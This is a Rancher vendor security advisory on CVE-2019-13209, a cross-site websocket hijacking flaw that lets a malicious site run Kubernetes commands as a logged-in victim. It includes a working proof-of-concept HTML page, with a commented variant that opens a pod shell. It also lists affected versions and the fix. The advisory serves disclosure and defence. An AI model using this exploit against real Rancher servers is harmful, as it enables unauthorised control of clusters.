Rancher Security Advisory: Heads up on Rancher CVE-2019-13209

Follow
Table of Contents

July 12, 2019

This advisory was first communicated by email, on the date mentioned above, to all Rancher customers with a then active support subscription.

Dear Rancher Customer,

This is an advisory heads-up on a security vulnerability discovered in Rancher that affects the following versions of Rancher:

  • v2.0.0-v2.0.15
  • v2.1.0-v2.1.10
  • v2.2.0-v2.2.4

The fix for this vulnerability will be made available in Rancher v2.2.5, v2.1.11, and v2.0.15.  Rancher v1.6 is NOT affected.

The vulnerability is known as a Cross-Site Websocket Hijacking attack (https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html).

This attack allows an exploiter to gain access to clusters managed by Rancher with the roles/permissions of a victim. It requires that a victim to be logged into a Rancher server and then access a third-party site hosted by the exploiter. Once that is accomplished, the exploiter is able to execute commands against the Kubernetes API with the permissions and identity of the victim.

Details of this attack are best explained through a proof-of-concept. The following is a POC html webpage that makes use of the exploit. This page could be hosted on any domain and be able to access the Rancher installation due to this vulnerability:

<!DOCTYPE html>

<html>

  <head>

    <meta charset="UTF-8">

    <title>POC</title>

  </head>

  <body>

    <script>

 

      const cmd = 'kubectl get pods --all-namespaces';

 

      // Open a websocket, no auth required with CSWSH

      const socket = new WebSocket('wss://rancher-installation-fqdn/v3/clusters/local?shell=true', 'base64.channel.k8s.io');

 

      // A similar exploit can be achieved against specific pods in the local or other clusters, but requires the attacker to know cluster and pod IDs

      // const socket = new WebSocket('wss://rancher-installation-fqdn/k8s/clusters/c-zkpzd/api/v1/namespaces/cattle-system/pods/cattle-cluster-agent-dc64696f7-57468/exec?container=cluster-register&stdout=1&stdin=1&stderr=1&tty=1&command=%2Fbin%2Fsh', 'base64.channel.k8s.io');

 

      // Send the command

      socket.onopen = (event) => {

      socket.send('0' + btoa(cmd + '\x0D'));

      };

 

      // Listen for the response

      socket.onmessage = (event) => {

      if (event.data.startsWith('1')) {

          console.log(atob(event.data.substring(1)));

      }

      };

    </script>

  </body>

</html>

If the victim is logged into the Rancher server running at "rancher-installation-fqdn" and then accesses this page, the browser's javascript console will output the results of the kubectl get pods --all-namespaces command.

To address this issue, we've added origin checking logic to our websocket endpoints. This prevents third-party sites from calling these endpoints.

Thanks to Matt Belisle and Alex Stevenson at Workiva for reporting this vulnerability. The official CVE when published next week will be listed on mitre.org as CVE-2019-13209

We expect to release v2.2.5, v2.1.11, and v2.0.15 next week (week beginning Mon, July 15th) that will include these fixes. 

Stay tuned. We will update you with a follow-up communication closer to the release.

If there are any questions, simply submit a request via this portal referencing this article and we will track and respond to your question as a Support Ticket.

 

Thanks

Rancher Support Team

Was this article helpful?
0 out of 0 found this helpful

Comments

0 comments

Article is closed for comments.